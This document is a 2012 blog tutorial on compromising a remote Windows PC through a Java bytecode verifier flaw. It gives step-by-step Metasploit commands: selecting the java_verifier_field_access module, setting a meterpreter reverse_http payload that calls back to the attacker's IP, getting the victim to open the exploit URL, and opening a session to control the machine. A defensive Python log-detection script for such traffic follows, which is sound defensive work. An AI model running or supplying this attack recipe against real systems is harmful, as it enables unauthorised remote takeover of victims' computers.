Thursday 30 August 2012

Hacking Remote PC by Exploiting Java Applet Field



This is a vulnerability in the HotSpot bytecode verifier, where an invalid optimization of the GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially crafted class file could use this flaw to bypass Java sandbox restrictions and load additional classes in order to perform malicious operations.
Requirements:
* Attacker machine: Backtrack
* Victim machine: Windows (with an unpatched JRE version installed)
Step 1: Launch the Metasploit console
Open the terminal on the attacker machine (Backtrack).
Type "msfupdate"; this will update Metasploit with the latest modules.
Now type "msfconsole" to interact with the Metasploit framework.
Step 2:
Type "use exploit/multi/browser/java_verifier_field_access" and follow the commands below:
msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit
Step 3:
If you follow the above commands correctly, you will get the result shown in the image.
Copy the URL and open the link on the victim machine. Once the URL has loaded on the victim machine, it will launch the exploit and create a new session.
Now type "sessions"; this will show the list of active sessions.
Type "sessions -i 1"; this will open the connection to the session with the ID '1' and bring you to Meterpreter. Meterpreter lets you interact with and control the target.
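
Seen from the defender's side, the steps above leave HTTP requests from the victim's JRE to a bare IP address (the LHOST value), and a JRE's built-in HTTP client identifies itself with a User-Agent containing "Java/<version>". The following Python check is an added example, not part of the original post; the log format, addresses, paths and version string are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed proxy log lines (assumed format, not from the original post):
# timestamp client_ip method url "user-agent"
SAMPLE_LOG = '''\
2012-08-30T10:01:02 10.0.0.21 GET http://192.0.2.10:8080/demo/ "Mozilla/5.0 (Windows NT 6.1) Firefox/14.0"
2012-08-30T10:01:04 10.0.0.21 GET http://192.0.2.10:8080/demo/applet.jar "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_00"
2012-08-30T10:01:09 10.0.0.21 POST http://192.0.2.10:8080/demo/callback "Java/1.7.0_00"
2012-08-30T10:02:00 10.0.0.35 GET http://updates.example.com/tool.jar "Java/1.7.0_00"
2012-08-30T10:03:00 10.0.0.40 GET http://198.51.100.7/index.html "Mozilla/5.0 (Windows NT 6.1) Firefox/14.0"
'''

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')
JAVA_UA_RE = re.compile(r'\bJava/\d')  # User-Agent token sent by the JRE HTTP client


def host_is_ip_literal(url):
    """True when the URL's host is an IP address rather than a DNS name."""
    host = urlsplit(url).hostname
    if host is None:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_suspicious(log_text):
    """Return {client_ip: [urls]} for JRE-originated requests to bare-IP hosts."""
    hits = {}
    for line in log_text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # skip lines that do not fit the assumed format
        _ts, client, _method, url, user_agent = match.groups()
        if JAVA_UA_RE.search(user_agent) and host_is_ip_literal(url):
            hits.setdefault(client, []).append(url)
    return hits


if __name__ == "__main__":
    for client, urls in find_suspicious(SAMPLE_LOG).items():
        print(client, "->", ", ".join(urls))
```

Requests from a browser to an IP address, or from a JRE to a named host, are not flagged, so the rule stays narrow; on a real network it is a triage signal to review, not proof of compromise.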
